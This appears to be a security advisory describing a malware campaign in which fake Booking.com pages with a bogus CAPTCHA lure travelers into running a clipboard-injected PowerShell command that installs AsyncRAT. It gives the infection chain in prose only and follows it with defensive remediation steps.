Analysis Summary

Cybercriminals have launched a highly deceptive campaign that targets travelers by leveraging fake Booking.com websites to distribute AsyncRAT malware.

According to the Researcher, the attackers lure victims through misleading sponsored advertisements, social media posts, and gaming sites, redirecting them to convincing replica booking pages. These fake websites appear genuine and exploit the fact that around 40% of travelers search and book their trips using general online search engines, creating a wide attack surface for malicious actors to operate within.

Once users arrive on these fraudulent booking platforms, they are presented with a fake CAPTCHA verification prompt, a tactic that mimics legitimate security practices commonly seen on authentic websites. However, this CAPTCHA serves a far more dangerous purpose. Behind the scenes, it silently copies obfuscated PowerShell commands to the user’s clipboard without their knowledge. This command, designed to appear as a random or unreadable string, is concealed using techniques such as mixed letter casing, broken quotes, and manipulated variable names to evade detection and raise no immediate suspicion.

When decoded and executed, the PowerShell script launches a hidden terminal that downloads a file named ckjg.exe, which then retrieves and runs Stub.exe. This final payload installs AsyncRAT, a powerful remote access trojan, onto the victim’s device. This RAT grants the attackers complete remote control of the compromised machine, enabling data theft, surveillance, and the potential for further exploitation. This multi-stage infection chain demonstrates a well-orchestrated combination of obfuscation and staged payload delivery.

The most alarming aspect of the attack is its use of social engineering to manipulate users into compromising themselves. After the malicious command is silently copied to the clipboard, the fake booking site presents instructions encouraging the user to paste and run the command via the Windows Run dialog box, under the guise of completing their reservation. This deceptive method transforms the victim into an unknowing participant in their own device’s infection, effectively bypassing many traditional security measures and relying instead on human error and trust in familiar digital interfaces.

Impact

• Sensitive Data Theft
• Gain Access

Indicators of Compromise

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Refrain from visiting travel sites via social media ads, gaming sites, or unfamiliar links. Always go directly to official URLs.
• Double-check domain names for typos or unusual characters. Use trusted sources or bookmarks to access booking platforms.
• Train employees and users to recognize deceptive CAPTCHA prompts and avoid executing unknown commands or scripts.
• Use browser settings or extensions to restrict clipboard access from websites, reducing the risk of automatic malicious copying.
• Implement Group Policies to limit PowerShell usage, particularly for non-administrative users, and block script execution when not needed.
• Use endpoint detection solutions that can monitor for unusual clipboard actions or unauthorized PowerShell usage.
• Utilize EDR tools that can detect and block AsyncRAT and similar malware based on behavior, not just signatures.
• Keep all operating systems, browsers, and security software up to date to minimize vulnerabilities.
• Allow only approved applications and scripts to run on user systems to prevent the execution of unverified malware.
• If a fake site is encountered, report it to your IT/security team and platforms like Google Safe Browsing or Microsoft.